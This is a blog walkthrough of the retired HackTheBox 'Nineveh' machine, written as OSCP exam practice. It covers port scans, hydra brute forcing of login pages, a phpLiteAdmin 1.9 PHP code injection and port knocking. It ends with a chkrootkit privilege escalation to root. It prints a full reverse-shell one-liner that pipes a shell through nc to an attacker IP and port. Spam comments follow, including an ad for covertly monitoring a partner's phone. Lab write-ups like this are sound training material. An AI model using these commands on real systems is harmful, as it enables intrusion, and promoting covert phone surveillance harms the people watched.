OSCP PREPROTİONS – HTB Nineveh

Nineveh machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using this vulnerability.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full port scan

As a result of network scanning, 80/tcp http Apache httpd, 443/tcp ssl/http Apache httpd ports are open.
We continue via brwoser to enumerate these ports.
80.port

A Gobuster scan detected the /department directory.

We tried default passwords to redirect us to the login page, we tried parameters in case of sql injetin, we did not get any results.
Here, when we type the username muhammed, it says the username is wrong, when we enter the admin user, it says the password is wrong. Therefore, we will try brute force with hydra.

Our brute force attack was successful
login: admin password: 1q2w3e4r5t
credential information.

We were able to log in successfully. We could not get much significant information here. We could only see get requests on the url side in the Notes section. Let’s dot this part and continue on port 443.

443.port

We looked at the source code and since we couldn’t get any valuable information, we ran a scan with Gobuster.
Gobuster scan

A directory file scan detected the directory/db.

Let’s try a brute force attack with hydra here too

Here, thanks to hydra, we have detected host: 10.10.10.10.43 password: password123 credential information.
Let’s log in with this information.

This way we can log in to the phpLiteAdmin v1.9 panel. Let’s see if there is a vulnerability in this panel version via searchsploit.

We were able to see the vulnerability of this panel.

Thanks to this vulnerability, an attacker can create a php-based database and abuse it.
Let’s apply the steps here in order
1- A db named hack.php is created.
2- A special table is created in this db and a command to be added is added, we will add the command.
3- We run the hack.php file
While performing these steps we can run our command.

Here is the final version

To make a request to it now, let’s communicate via http, that is, through the dahsbosrd directory on port 80
It didn’t work because we wrote it as nineveh.php here.
Let’s see if our php code will work by using the name of ninevehNotes.txt as default.

As you can see, we have provided command injection here.

Now let’s give ourselves a revershell
We ran the Ls command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f
We send the command through the burp suite
listening with nc in the background

This is how we got our shelter

We didn’t get user flag and root flag, so we provide local enumeration.

/var/www/ssl/secure_notes/nineveh.png
We were able to see the ssh key.
We cannot pull and connect it to our machine with scp, so we will transfer files with nc

We saved our ssl key, tried to connect and couldn’t connect via ssh. We didn’t find anything in the nmap scan that ssh was open.

So let’s continue with local enumeration

Here we understand that something is happening on ports 571 290 911. We can think that there is a secret passage here to close the services to the outside, that is, Port Knocking management has been applied, we can think that the ssh port will be opened when knocking on the ports specified here. One way to confirm this is to detect knockd files.

As we can see here, as it is understood in the mail, it is understood to write the command that opens the ssh port if a 5 millisecond scan is provided to ports 571, 290, 911 respectively.

Therefore, we will scan using the knock tool.

Here we have seen that the ssh port is opened.
Now let’s connect using the ssh key.

As you can see, we provided our ssh connection and we were able to get our user flag.
Since we do not have root authorization here, we cannot access root.

Therefore we provide local enumeration.

At the end of the Linpeas scan, we say that we can raise local authorization from the /usr/sbin/report-reset.sh file.

Here is a crontab that deletes the txt files in the /report directory. It is important who is running this crontab. If there is a process running here with root privileges, we will try to exploit it.
To see the details of the processes running behind, we upload the pspy tool to the target machine and scan it.

Too many chkrootkit files catch our eye, let’s see if there are exploits related to this in searchspoloite

We have seen that we can do local privilege escalation related to Chkrootkit. To use this exploit, we need to do it in order;
We create a file named update in the /tmp directory as a non-root user.
Then we write a bash script that will give us Shell in this update file

This way we got our shell
And we’ve lede our root flag

Comments

  1. ecommerce

    Good day! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m
    not seeing very good success. If you know of any please share.
    Kudos! You can read similar article here: Najlepszy sklep

  2. Rastrear Celular

    O que devo fazer se tiver dúvidas sobre meu parceiro, como monitorar o telefone celular do parceiro? Com a popularidade dos telefones inteligentes, agora existem maneiras mais convenientes. Por meio do software de monitoramento do telefone móvel, você pode tirar fotos remotamente, monitorar, gravar, fazer capturas de tela em tempo real, voz em tempo real e visualizar telas do telefone móvel.

  3. Tonicgreens

    Yesterday, while I was at work, my cousin stole my iPad and tested to see if it can survive a twenty five foot drop, just so she can be a youtube sensation. My iPad is now destroyed and she has 83 views. I know this is totally off topic but I had to share it with someone!

  4. Fitspresso review

    I want to show some appreciation to this writer just for rescuing me from this crisis. Just after searching through the search engines and meeting tips which are not helpful, I thought my entire life was gone. Living devoid of the strategies to the issues you’ve fixed as a result of your good site is a serious case, and the ones which could have in a negative way damaged my entire career if I had not noticed your site. Your ability and kindness in dealing with all the details was tremendous. I don’t know what I would’ve done if I had not encountered such a thing like this. I’m able to now look ahead to my future. Thanks for your time so much for this reliable and amazing guide. I will not hesitate to recommend your web page to any person who should have counselling about this area.

  5. 네이버 아이디 구매

    저희는 구글 계정 판매 전문 회사입니다.우리의 구글 계정은 이메일, 문서, 캘리더, 클라우드 저장 등의 기능을 포함한 포괄적인 디지털 솔루션을 제공합니다.구글 계정을 통해 우리는 사용자에게 효율적인 협업 플랫품을 제공하여 개인과 팀이 일과 삶을 더 스마트하게 관리할 수 있도록 지원합니다.

  6. Boostaro

    I really like your writing style, excellent information, thank you for posting :D. “Freedom is the emancipation from the arbitrary rule of other men.” by Mortimer Adler.

  7. 네이버 아이디 구매

    저희는 구글 계정 판매 전문 회사입니다.우리의 구글 계정은 이메일, 문서, 캘리더, 클라우드 저장 등의 기능을 포함한 포괄적인 디지털 솔루션을 제공합니다.구글 계정을 통해 우리는 사용자에게 효율적인 협업 플랫품을 제공하여 개인과 팀이 일과 삶을 더 스마트하게 관리할 수 있도록 지원합니다.

  8. Sight Care

    It’s actually a cool and helpful piece of information. I am satisfied that you shared this useful info with us. Please stay us informed like this. Thank you for sharing.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir